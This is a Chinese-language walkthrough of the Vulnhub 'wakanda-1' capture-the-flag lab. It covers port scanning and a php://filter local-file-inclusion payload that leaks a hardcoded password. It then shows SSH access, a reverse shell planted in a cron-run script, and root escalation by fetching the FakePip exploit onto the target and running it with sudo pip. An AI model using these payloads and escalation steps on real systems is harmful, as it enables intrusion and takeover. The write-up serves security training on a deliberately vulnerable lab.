Vulnhub靶場：wakanda-1

Vulnhub靶場：wakanda-1

一、環境准備

1，下載地址：https://www.vulnhub.com/entry/wakanda-1,251/

2，下載之后，使用VirtualBox虛擬機軟件導入虛擬機

3，啟動，為了方便測試，網絡選擇了橋接模式

二、滲透練習

1，收集靶機ip地址

輸入命令：netdiscover

發現靶機ip地址為，192.168.1.102

 2，收集靶機端口信息

-sS，TCP同步掃描(TCP SYN)，因為不必全部打開一個TCP連接，所以這項技術通常稱為半開掃描(half-open)。這項技術最大的好處是，很少有系統能夠把這記入系統日志。不過，你需要root權限來定制SYN數據包。

-T4，指定掃描過程使用的時序（Timing），總有6個級別（0-5），級別越高，掃描速度越快，但也容易被防火牆或IDS檢測並屏蔽掉，在網絡通訊狀況良好的情況推薦使用T4

-p-，指定掃描的端口為所有端口，及1-65535

開放端口：

80端口，為http服務

111端口，為RPC服務所有端口

3333端口，探測發現運行的為ssh服務端口

48628端口，未知端口

3，開啟了80端口，就訪問尋找突破點

4，只有一個頁面，看着沒利用漏洞，使用dirb爆破目錄看是否有可利用

輸入命令：dirb http://192.168.1.102

嘗試訪問界面，都沒有返回信息

5，仔細看了下源碼， 發現注釋的一句 href="?lang=fr"，將URL添加上之后，頁面語言變成了法語

lang表示可切換的網站語言（網站常常具支持多語言，例如英語、法語、中文等），fr表示法語。我們嘗試在HTTP URL中添加這個參數，切換語言為法語。

 

6，嘗試利用，可能存在文件包含漏洞，嘗試讀取源碼

payload：http://192.168.1.102/?lang=php://filter/convert.base64-encode/resource=index

得到了網站源碼

PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=

解碼之后為，得到一個密碼Niamey4Ever227!!!

7，因為網站沒有后台，所以嘗試ssh登錄，在網站首頁，能發現一個敏感信息 @mamadou

 

輸入命令， ssh mamadou@192.168.1.102 -p 3333

輸入得到的密碼 Niamey4Ever227!!!

 

 登錄成功，不過使用的shell是python的，而不是bash，所以就先切換shell

import pty

pty.spawn("/bin/bash")

 成功切換shell

 

 8，獲得第一個flag，就在ssh登錄之后的目錄

 9，使用find / -name 'flag*'，不能搜索，提示沒權限

 10，查看敏感信息，發現另外的用戶devops

 進入用戶目錄，發現flag2.txt，但是沒有權限查看

 11，發現在/tmp下有個test文件，時間為靶機執行之后的時間創建的，應該是靶機會自動創建test文件

 在/srv目錄下發現了創建test文件的腳本

 

 12，使用vi編輯器，編輯腳本，加上反彈shell的命令

 13，本機監聽1234端口，nc -lvvp 1234,一會就接受到了反彈的shell

查看flag2

 

 14，進行提權，

輸入命令：sudo -l,發現devops賬戶下，能不需要密碼就運行的命令之后pip

尋找可以的exp，url：https://raw.githubusercontent.com/0x00-0x00/FakePip/master/setup.py 

下載下來之后，修改里面的LHOST和LPORT為自己靶機的ip和需要監聽的端口

 15，在devops用戶上，下載exp

開啟kali上apache服務，service apache2 start

 或者利用python搭建web服務， python -m SimpleHTTPServer 8888 ，888為訪問端口號

為了方便，我就用apache了

在devops用戶的shell下，運行wget http://192.168.1.103/setup.py

下載成功

 16，在本機再次監聽端口，這次監聽的為exp下設置的端口號，我設置的為2345，所以輸入 nc -lvvp 2345

 在靶機上執行，sudo /usr/bin/pip install . --upgrade --force-reinstall，可以看到反彈shell成功，用戶為root

 17，查看最終flag

輸入命令，cd root

輸入命令，cat root.txt

 完